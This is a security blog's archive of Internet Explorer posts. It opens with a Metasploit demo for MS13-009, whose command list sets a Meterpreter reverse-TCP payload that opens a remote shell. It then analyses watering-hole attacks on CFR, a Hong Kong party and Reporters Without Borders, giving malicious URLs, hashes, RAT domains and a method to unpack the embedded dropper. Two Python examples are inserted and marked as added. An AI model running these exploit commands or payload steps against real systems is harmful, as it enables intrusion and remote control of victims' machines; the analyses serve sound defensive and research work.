Tag Archives: Internet Explorer

MS13-009 Microsoft Internet Explorer SLayoutRun UAF Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Scott Bell
Coordinated public release of the vulnerability on 2013-02-12
Metasploit PoC provided on 2013-02-21

PoC provided by :

Scott Bell

Reference(s) :

CVE-2013-0025
OSVDB-90122
BID-57830
MS13-009

Affected version(s) :

Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.

Commands :

use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

A Deeper Look In CVE-2012-4792 Watering Hole Campaigns – Alljap Chapter

This post is a small part of an in-depth analysis of the December watering hole campaign involving an Internet Explorer 0day. Jindrich Kubec and I are working hard to synthesize all this information into a high-level overview.

As I mentioned to threatpost.com on 14 January, additional web sites were discovered hosting the Internet Explorer CVE-2012-4792 exploit. One of them was “All Jap auto parts” (www.alljap.net), an importer of second-hand Japanese engines and car parts located in Brisbane, Queensland, Australia.

StopMalvertising published an analysis that I recommend for additional information.

When I discovered this infected web site, I first noticed that the files were time-stamped (HTTP Last-Modified entity header) at the following dates:

  • deployJava.js : Fri, 14 Dec 2012 15:47:42 GMT
  • index.html : Fri, 14 Dec 2012 15:49:58 GMT
  • news.html : Fri, 14 Dec 2012 15:50:42 GMT
  • robots.txt : Fri, 14 Dec 2012 15:50:57 GMT
  • today.swf : Fri, 14 Dec 2012 15:51:08 GMT
  • xsainfo.jpg : Fri, 14 Dec 2012 15:56:44 GMT

The “index.html” file supported Simplified Chinese (zh-cn), Taiwanese Mandarin (zh-tw), Japanese (ja), American English (en-us) and Russian (ru). The “girl” and “boy” patterns were present, and the “hello” text was hidden.

The CFR.org version of “index.html” that I found in Google cache, dating from 7 December, only supported Simplified Chinese (zh-cn), Taiwanese Mandarin (zh-tw) and American English (en-us). The “girl” and “boy” patterns were also present, and the “hello” text was not hidden.

The CFR.org version reported by FireEye, from around 20 December, supported Simplified Chinese (zh-cn), Taiwanese Mandarin (zh-tw), Japanese (ja), American English (en-us), Russian (ru) and Korean (ko). The “girl” and “boy” patterns were gone, replaced by the “ms-help:” technique to bypass ASLR on Windows 7 (the ms-help: protocol handler loads the Office helper hxds.dll, which is not ASLR-enabled and so gives the exploit a module at a fixed address). The “hello” text was also hidden.

From these samples alone, from CFR.org and All Jap auto parts, we can observe that the attackers changed tactics multiple times during this campaign.

By analyzing the samples of the other infected web sites (around 40 samples), I observed that All Jap auto parts was not used in that watering hole campaign: none of the high-value legitimate web sites included this site by iframe or by JavaScript inclusion.

Looking further at All Jap auto parts, I first observed that the hosted phpMyFAQ and WWWBoard tools had not been updated for a long time. After some Google dorks, I found two PHP backdoors and the Apache logs (from 13 November to the beginning of February), all freely accessible from the Internet. For the rest of this post we will name the first backdoor BK1 and the second BK2.

Having free access to the logs was a unique opportunity to find additional evidence about the attackers and about the differences between the samples and patterns.

I first searched the logs for accesses to the backdoors. BK1 was not present in the logs, but BK2 was accessed on 7 December by the IP 112.175.234.199. This IP is located in South Korea and is associated with a FlyVPN.com VPN mirror. The user agent associated with this IP is Internet Explorer 8 on Windows XP.

112.175.234.199 – – [07/Dec/2012 00:31:22 +0000] “GET /BK2.php HTTP/1.1” 200 371 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)”

By searching for additional references to this IP, we can observe a first access to the CVE-2012-4792 exploit on 7 December with a different user agent, Firefox 12 on Windows XP.

112.175.234.199 – – [07/Dec/2012 01:18:59 +0000] “GET /wwwboard/news/index.html HTTP/1.1” 200 5776 “http://www.gbn.com/” “Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0”

We can directly observe that the HTTP referer was Global Business Network (www.gbn.com), and therefore that All Jap auto parts was also involved in a watering hole campaign. Description of GBN:

GBN helps organizations adapt and grow in an increasingly uncertain and volatile world. Using our leading-edge tools and expertise—scenario planning, experiential learning, networks of experts and visionaries—we enable our clients to address their most critical challenges and gain the insight, confidence, and capabilities they need to shape the future.

We can also confirm, as for CFR.org, that the exploit was present on All Jap auto parts since at least 7 December.

A complete analysis of the logs gives the following timeline and information.

Alljap - 112.175.234.199 - South Korea IP Activities

Dates | User Agents | Actions
07/Dec/2012 00:31:22 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
07/Dec/2012 00:31:25 to 00:32:47 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
07/Dec/2012 00:32:58 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Modify mail.php through BK2
07/Dec/2012 00:33:10 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Modify tw.htm through BK2
07/Dec/2012 00:33:24 to 00:40:05 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
07/Dec/2012 01:18:59 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com
07/Dec/2012 17:55:15 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com

This IP accessed BK2 directly, with no other page visits. You can observe that some PHP mail code (mail.php) was put in place to send spear-phishing emails targeting Taiwanese people (tw.htm). A bunch of operations were done through BK2. You can also observe that they tested the exploit with Firefox 12.

Alljap - 113.30.106.94 - South Korea IP Activities

Dates | User Agents | Actions
10/Dec/2012 08:15:34 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Check presence of 0day
10/Dec/2012 08:15:56 to 08:19:00 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 08:19:25 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to demo.txt (demo~) file
10/Dec/2012 08:19:34 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Test 0day
10/Dec/2012 08:20:13 to 08:22:11 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 08:27:30 to 08:29:54 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Test 0day through GBN.com

This IP accessed BK2 directly, with no other page visits, and manipulated the content of the CVE-2012-4792 0day. The IP is located in South Korea, with only a PPTP VPN port open. You can also observe the use of a file named “demo.txt”.

Alljap - 59.124.14.102 - Taiwan IP Activities

Dates | User Agents | Actions
10/Dec/2012 08:42:34 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
10/Dec/2012 08:42:38 to 08:44:00 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 08:54:36 to 08:54:49 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Test 0day through GBN.com
10/Dec/2012 09:09:52 to 09:09:57 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 09:11:08 to 09:11:55 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access 0day files
10/Dec/2012 09:12:14 to 09:13:18 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test presence of deployJava.js
10/Dec/2012 09:13:41 to 09:15:36 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2
10/Dec/2012 09:23:10 to 09:28:11 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Operations through BK2

This IP accessed BK2 directly, with no other page visits, manipulated the content of the CVE-2012-4792 0day and ran some tests from GBN.com. The IP is located in Taiwan, with only a PPTP VPN port open.

Alljap - 112.213.97.39 - Hong-Kong IP Activities

Dates | User Agents | Actions
14/Dec/2012 15:44:40 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
14/Dec/2012 15:44:47 to 15:49:58 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2

This IP accessed BK2 directly, with no other page visits, and manipulated the content of the CVE-2012-4792 0day. The IP is located in Hong Kong, with only a PPTP VPN port open.

Alljap - 113.30.106.92 - South Korea IP Activities

Dates | User Agents | Actions
14/Dec/2012 15:50:42 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
14/Dec/2012 15:50:57 to 15:52:57 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operations through BK2

This IP accessed BK2 directly, with no other page visits, and manipulated the content of the CVE-2012-4792 0day. The IP is located in South Korea, with only a PPTP VPN port open.

Alljap - 110.4.82.38 - South Korea IP Activities

Dates | User Agents | Actions
14/Dec/2012 15:54:14 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Check presence of demo.txt file
14/Dec/2012 15:55:04 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Access to BK2
14/Dec/2012 15:56:44 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) | Operation through BK2
14/Dec/2012 16:02:19 to 16:03:56 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com
16/Dec/2012 12:08:45 | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | Test 0day through GBN.com

This IP accessed BK2 directly, with no other page visits, manipulated the content of the CVE-2012-4792 0day and ran some tests from GBN.com. The IP is located in South Korea.

As you can see, the attackers made massive use of VPN connections to reach BK2. If you compare the “Last-Modified” HTTP headers of the samples with this timeline, you can see that they correspond to the manipulations of the last three IPs.

As we have the complete Apache logs, I was also able to analyze the population exposed to the watering hole campaign through GBN.

My first analysis was to list all successful hits on the “index.html” file from 7 December to 17 December, without any filtering. By clicking on the following link you will access a Google Fusion Table providing all associated information.

[link: alljap-all-hits (Google Fusion Table)]

You can also find the TOP 10 countries that hit the exploit.

Alljap - All Hits TOP 10 Countries

Country | Unique IP count
US | 311
BR | 77
CN | 64
TR | 44
GB | 30
DE | 25
CA | 23
IN | 19
FR | 19
MX | 18

My second analysis was to list all potentially successful exploitations, i.e. successful hits from “MSIE 8.0” user agents, from 7 December to 17 December. By clicking on the following link you will access a Google Fusion Table providing all associated information.

[link: alljap-msie8-hits (Google Fusion Table)]

You can also find the TOP 10 countries that hit the exploit with MSIE 8.0.

Alljap - All MSIE 8.0 Hits TOP 10 Countries

Country | Unique IP count
US | 35
CN | 13
TR | 5
BR | 3
GB | 3
RO | 3
MA | 3
AU | 3
HK | 2
TH | 2

You can see that the potential success rate, compared to the number of GBN visitors, is very low. Using an exploit only capable of targeting MSIE 8.0 was clearly a limiting factor.
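The log triage described in this post (backdoor accesses per IP, exploit hits filtered by referer and user agent, and the correlation of the samples' Last-Modified headers with backdoor activity) as an added example in Python. This is not the author's script and not code from the original post. It runs on constructed log lines modelled on the two quoted above; they reuse IPs and paths named in the post, but the request mix, the 203.0.113.x and 198.51.100.x visitors, and the “/BK2.php” path (the post does not give the backdoor's real name) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

# Constructed sample log, modelled on the two lines quoted in the post. IPs and paths
# are the ones the post names; the 203.0.113.x / 198.51.100.x visitors and the exact
# request mix are invented, and "/BK2.php" stands in for the undisclosed backdoor path.
IE8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
FF12 = "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
CHROME = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
SAMPLE_LOG = "\n".join([
    f'112.175.234.199 - - [07/Dec/2012 00:31:22 +0000] "GET /BK2.php HTTP/1.1" 200 371 "-" "{IE8}"',
    f'112.175.234.199 - - [07/Dec/2012 00:32:58 +0000] "POST /BK2.php HTTP/1.1" 200 512 "-" "{IE8}"',
    f'112.175.234.199 - - [07/Dec/2012 01:18:59 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "{FF12}"',
    f'113.30.106.94 - - [10/Dec/2012 08:15:34 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "-" "{IE8}"',
    f'203.0.113.10 - - [11/Dec/2012 14:02:11 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "{IE8}"',
    f'203.0.113.10 - - [11/Dec/2012 14:02:12 +0000] "GET /wwwboard/news/today.swf HTTP/1.1" 200 1024 "http://www.alljap.net/wwwboard/news/index.html" "{IE8}"',
    f'198.51.100.7 - - [11/Dec/2012 15:30:00 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 200 5776 "http://www.gbn.com/" "{CHROME}"',
    f'198.51.100.8 - - [12/Dec/2012 09:00:00 +0000] "GET /wwwboard/news/index.html HTTP/1.1" 404 210 "http://www.gbn.com/" "{IE8}"',
    f'112.213.97.39 - - [14/Dec/2012 15:45:30 +0000] "POST /BK2.php HTTP/1.1" 200 388 "-" "{IE8}"',
    f'110.4.82.38 - - [14/Dec/2012 15:56:44 +0000] "POST /BK2.php HTTP/1.1" 200 340 "-" "{IE8}"',
])
BACKDOOR = "/BK2.php"                      # assumed path of BK2
EXPLOIT_PAGE = "/wwwboard/news/index.html"  # exploit landing page from the quoted log line
WATERING_HOLE = "www.gbn.com"

# Apache "combined" format. The post renders the timestamp as "07/Dec/2012 00:31:22 +0000";
# stock Apache writes "07/Dec/2012:00:31:22 +0000", so either separator is accepted.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ '
    r'\[(?P<day>\d{2}/[A-Za-z]{3}/\d{4})[ :](?P<time>\d{2}:\d{2}:\d{2}) (?P<tz>[+-]\d{4})\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)

def parse_line(line):
    """One combined-format line -> dict with a timezone-aware timestamp, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    ts = datetime.strptime(f"{d['day']} {d['time']} {d['tz']}", "%d/%b/%Y %H:%M:%S %z")
    return {"ip": d["ip"], "ts": ts, "method": d["method"], "path": d["path"],
            "status": int(d["status"]), "referer": d["referer"], "ua": d["ua"]}

def parse_log(text):
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]

def backdoor_timeline(entries, backdoor_path):
    """IP -> chronological (timestamp, method, user agent) list of hits on the backdoor."""
    by_ip = defaultdict(list)
    for e in sorted(entries, key=lambda e: e["ts"]):
        if e["path"] == backdoor_path:
            by_ip[e["ip"]].append((e["ts"], e["method"], e["ua"]))
    return dict(by_ip)

def exploit_hits(entries, page, referer_host=None, ua_marker=None):
    """HTTP 200 requests for the exploit page, optionally restricted to visitors sent by
    a given referer host (the watering hole) and to user agents containing ua_marker."""
    out = []
    for e in entries:
        if e["path"] != page or e["status"] != 200:
            continue
        if referer_host and (urlsplit(e["referer"]).hostname or "") != referer_host:
            continue
        if ua_marker and ua_marker not in e["ua"]:
            continue
        out.append(e)
    return out

def unique_ips(entries):
    return sorted({e["ip"] for e in entries})

def parse_http_date(value):
    """RFC 1123 date as used in Last-Modified, e.g. 'Fri, 14 Dec 2012 15:56:44 GMT'."""
    return datetime.strptime(value, "%a, %d %b %Y %H:%M:%S GMT").replace(tzinfo=timezone.utc)

def who_modified(entries, backdoor_path, last_modified, window=timedelta(minutes=10)):
    """IPs that used the backdoor in the window ending at a file's Last-Modified time,
    i.e. the likely authors of that modification."""
    lo = last_modified - window
    return sorted({e["ip"] for e in entries
                   if e["path"] == backdoor_path and lo <= e["ts"] <= last_modified})

if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for ip, hits in backdoor_timeline(entries, BACKDOOR).items():
        print(ip, [(t.strftime("%d/%b %H:%M:%S"), m) for t, m, _ in hits])
    print("GBN-referred 200s:", unique_ips(exploit_hits(entries, EXPLOIT_PAGE, WATERING_HOLE)))
    print("GBN-referred MSIE 8.0:", unique_ips(exploit_hits(entries, EXPLOIT_PAGE, WATERING_HOLE, "MSIE 8.0")))
    for name, lm in {"deployJava.js": "Fri, 14 Dec 2012 15:47:42 GMT",
                     "xsainfo.jpg": "Fri, 14 Dec 2012 15:56:44 GMT"}.items():
        print(name, "->", who_modified(entries, BACKDOOR, parse_http_date(lm)))
```

With the real logs, replace SAMPLE_LOG with the file contents and BACKDOOR with the actual backdoor path. The per-country counts in the post need a GeoIP lookup, which is left out so the example runs offline; the “MSIE 8.0” filter only marks potential victims, since a 200 on the landing page says nothing about whether the exploit actually ran.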

As explained at the beginning of this post, this is only a small part of what has been analyzed. Jindrich Kubec and I will provide additional information soon.

Reporters Without Borders Victim of Watering Hole Campaign

As mentioned by Jindrich on Twitter, it seems that the entity or entities behind the watering hole attacks don’t care about being caught or detected, and it also seems that they don’t care that the Internet Explorer and Java vulnerabilities are patched. They act as opportunists and try to take advantage of the timeframe between the patch release and its application by some users, companies and non-governmental organizations.

Last week Jindrich Kubec and I reported on watering hole attacks against multiple high-value web sites, including, for example, major Hong Kong political parties. These web sites used the latest Internet Explorer vulnerability (CVE-2012-4792), patched in MS13-008, but also the latest Java vulnerability (CVE-2013-0422), patched in Oracle Java 7 Update 11.

It seems that one week later, Reporters Without Borders, a French-based international non-governmental organization that advocates freedom of the press and freedom of information, is the new web site used for the watering hole campaign. Such an organization is an ideal target for a watering hole campaign, as right now the miscreants seem to concentrate only on human rights/political sites: many Tibetan, some Uyghur, and some political parties in Hong Kong and Taiwan, which are the latest hits in this operation. In our opinion the finger could safely be pointed at China (again).

As for the Hong Kong political party, the English version of RWB was doing a JavaScript inclusion of “hxxp://en.rsf.org/local/cache-js/m.js”.

[image: rsf-en-m.js-file]

[image: rsf-en-traffic]

The “m.js” file creates a cookie “Somethingbbbbb” with a one-day expiration date. The cookie name can be linked to the Hong Kong political party “m.js”, whose cookie name was “Somethingeeee”. This kind of cookie was already used two years ago in similar attacks with different exploits.

If Internet Explorer 8 is used, an iframe is loaded from the “hxxp://newsite.acmetoy.com/m/d/pdf.html” file. Otherwise two iframes load “hxxp://98.129.194.210/CFIDE/debug/includes/java.html” and “hxxp://newsite.acmetoy.com/m/d/javapdf.html”.

newsite.acmetoy.com analysis

The “newsite.acmetoy.com” web site hosts the following CVE-2012-4792 related files:

  • “pdf.html” (ffe715a312a488daf3310712366a5024) : the traditional “DOITYOUR” obfuscated JavaScript file that attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792.
  • “logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f) : the traditional “DOITYOUR” variant of “today.swf”.
  • “DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) : the traditional “DOITYOUR” variant of “news.html”.
  • “DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0) : the traditional “DOITYOUR” variant of “robots.txt”.

The “newsite.acmetoy.com” web site also hosts the following Java vulnerability related files:

  • “javapdf.html” (b32bf36160c7a3cc5bc765672f7d6f2c) : JavaScript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
  • “AppletHigh.jar” (f02ffa2b293ff370d0ea3499d0ade9bd) : CVE-2013-0422 exploit.
  • “AppletLow.jar” (1da8f77dde43f55585896eddaff43896) : CVE-2011-3544 exploit.

98.129.194.210 analysis

The “98.129.194.210” web site hosts the following Java vulnerability related files. As you can see, they are exactly the same as above (same MD5s) and most probably serve only as a backup server in case of takedown.

  • “java.html” (b32bf36160c7a3cc5bc765672f7d6f2c) : JavaScript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
  • “AppletHigh.jar” (f02ffa2b293ff370d0ea3499d0ade9bd) : CVE-2013-0422 exploit.
  • “AppletLow.jar” (1da8f77dde43f55585896eddaff43896) : CVE-2011-3544 exploit.

These binaries were dropped by the exploits:

  • 686D0E4FAEE4B0EF93A8B9550BD544BF334A6D9B495EC7BE9E28A0F681F5495C, which is a remote access tool (RAT) programmed to contact “luckmevnc.myvnc.com” (112.140.186.252, Singapore) or “luckmegame.servegame.com” (currently parked).
  • A14CCC5922EFC6C7CEC1BB58C607381C99967ED4B7602B7427B081209AAF1656 is an interesting injector which downloads something that pretends to be an error web page, decodes its content, which is in fact position-independent code, and injects it into another process. This is also a RAT, contacting “d.wt.ikwb.com” (58.64.179.139, Hong Kong).

We have contacted the RSF webmaster and the code should already be removed. Avast and other anti-virus product users are protected on multiple levels against this threat; updating to the latest versions of the vulnerable software packages is also a must. Or get rid of them: most users can safely replace MSIE with another browser and completely uninstall Java, reducing the attack surface.

Watering Hole Campaign Use Latest Java and IE Vulnerabilities

Through a collaboration between Jindrich Kubec (@Jindroush), Director of Threat Intelligence at avast!, and Eric Romang (@eromang), independent security researcher, we can confirm that the watering hole campaigns are still ongoing, targeting multiple high-value web sites, including, for example, a major Hong Kong political party. We can also confirm that a second major Hong Kong political party is a victim of this watering hole campaign.

This web site is currently using the new version of the original Internet Explorer (CVE-2012-4792) exploit, patched in MS13-008, but right now it is also using the latest Java vulnerability (CVE-2013-0422), patched in Oracle Java 7 Update 11.

We will provide further details on the affected web sites after their cleaning.

The Chinese-language version of the targeted web site does a remote JavaScript inclusion of “hxxp://www.[REDACTED].org/board/data/m/m.js”.

[image: malicious-javascript-inclusion]

This web site, hosted in South Korea, is a legitimate compromised web site used for hosting the exploit files.

This include file uses the well-known “deployJava” function, aka “deployJava.js”, and creates a cookie “Somethingeeee” with a one-day expiration date. This cookie is quite strange, and it is also possible to find it in years-old exploits, which suggests this is only a part of a greater, long-running operation.

[image: mt.html-file-2]

If Internet Explorer 8 is used, an iframe is loaded from the “hxxp://www.[REDACTED].org/board/data/m/mt.html” file. Otherwise, if Oracle Java is detected, an iframe loads “hxxp://www.[REDACTED].org/board/data/m/javamt.html”.

Analysis of “mt.html”

“mt.html” (d85e34827980b13c9244cbcab13b35ea) is an obfuscated JavaScript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792, fixed in MS13-008 and provided by Microsoft Monday morning.

https://www.virustotal.com/file/58588ce6d0a1e042450946b03fa4cd92ac1b4246cb6879a7f50a0aab2a84086a/analysis/ (avast detects this code as JS:Bogidow-A [Expl] through the Script Shield component).

Compared to the original CFR and Capstone Turbine versions, this code does not target specific browser languages, but it is based on the version used on CFR with the “boy” and “girl” patterns.

The traditional “today.swf” has been replaced with “logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f), “news.html” has been replaced with “DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) and “robots.txt” has been replaced with “DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0). The traditional dropper “xsainfo.jpg” is now embedded in the “mt.html” file and obfuscated in the JavaScript.

The executable can be extracted from the string by cutting off the first 13 characters, converting the hex characters to binary and XORing the whole binary blob with 0xBF. The resulting file, with SHA256 CE6C5D2DCF5E9BDECBF15E95943F4FFA845F8F07ED2D10FD6E544F30A9353AD2, is a RAT communicating with a domain hosted in Hong Kong by New World Telecom.
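The unpacking step described above, as an added example (not the original post's code): the prefix length (13) and the XOR key (0xBF) are the values the post gives; the prefix text and the MZ/PE stub produced by build_sample_blob are constructed, since the real “mt.html” string is not reproduced here. The PE sanity check is there because a wrong prefix length or key yields bytes that hex-decode fine but are not an executable.

```python
import hashlib
import struct
from binascii import unhexlify

PREFIX_LEN = 13  # characters before the hex payload, as stated in the post
XOR_KEY = 0xBF   # single-byte key applied to the whole blob, as stated in the post

def decode_dropper(blob, prefix_len=PREFIX_LEN, key=XOR_KEY):
    """Cut off the prefix, hex-decode the rest and XOR every byte with `key`.
    Malformed hex raises ValueError (binascii.Error is a subclass), so a wrong
    prefix length is caught early instead of silently producing garbage."""
    hexpart = "".join(blob[prefix_len:].split())  # tolerate line breaks in the string
    if len(hexpart) % 2:
        raise ValueError("odd-length hex payload: check the prefix length")
    return bytes(b ^ key for b in unhexlify(hexpart))

def looks_like_pe(data):
    """Cheap check that the decoded bytes are a PE image: 'MZ' magic and a 'PE\\0\\0'
    signature at the e_lfanew offset stored at 0x3C of the DOS header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def sha256_hex(data):
    """Upper-case SHA256 hex digest, the form the post uses for the dropped RAT."""
    return hashlib.sha256(data).hexdigest().upper()

def build_sample_blob():
    """Constructed stand-in for the obfuscated string in mt.html: a minimal DOS/PE
    header stub, XORed with 0xBF, hex-encoded and prefixed with 13 junk characters.
    It is not the real dropper; it only exercises the decoding path."""
    stub = bytearray(b"MZ" + b"\0" * 0x3E)      # 0x40-byte DOS header
    struct.pack_into("<I", stub, 0x3C, 0x40)    # e_lfanew -> PE signature right after it
    stub += b"PE\0\0" + b"\0" * 4
    encoded = bytes(b ^ XOR_KEY for b in stub).hex()
    return "PREFIX_13CHR:" + encoded            # 13 characters of prefix, as in the post

if __name__ == "__main__":
    payload = decode_dropper(build_sample_blob())
    print("PE image:", looks_like_pe(payload), "SHA256:", sha256_hex(payload))
```

To use it on the real sample, paste the JavaScript string literal from “mt.html” into decode_dropper; if looks_like_pe returns False, the prefix length or key is wrong for that variant, and the SHA256 can then be compared against the hash given above.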

Analysis of “javamt.html”

“javamt.html” (b32bf36160c7a3cc5bc765672f7d6f2c) checks whether Oracle Java 7 is present; if so, the latest Java vulnerability, CVE-2013-0422, is exploited through “AppletHigh.jar” (521eab796271254793280746dbfd9951). If Oracle Java 6 is present, “AppletLow.jar” (2062203f0ecdaf60df34b5bdfd8eacdc) exploits CVE-2011-3544. Both applets contain the very same binary mentioned above (unencrypted).

[image: javamt.html-file]

Conclusion

As you can see, the watering hole campaign still continues, but has evolved both in form and by using the latest Oracle Java vulnerability. There is just one piece of advice: patch, patch, patch… and see you soon.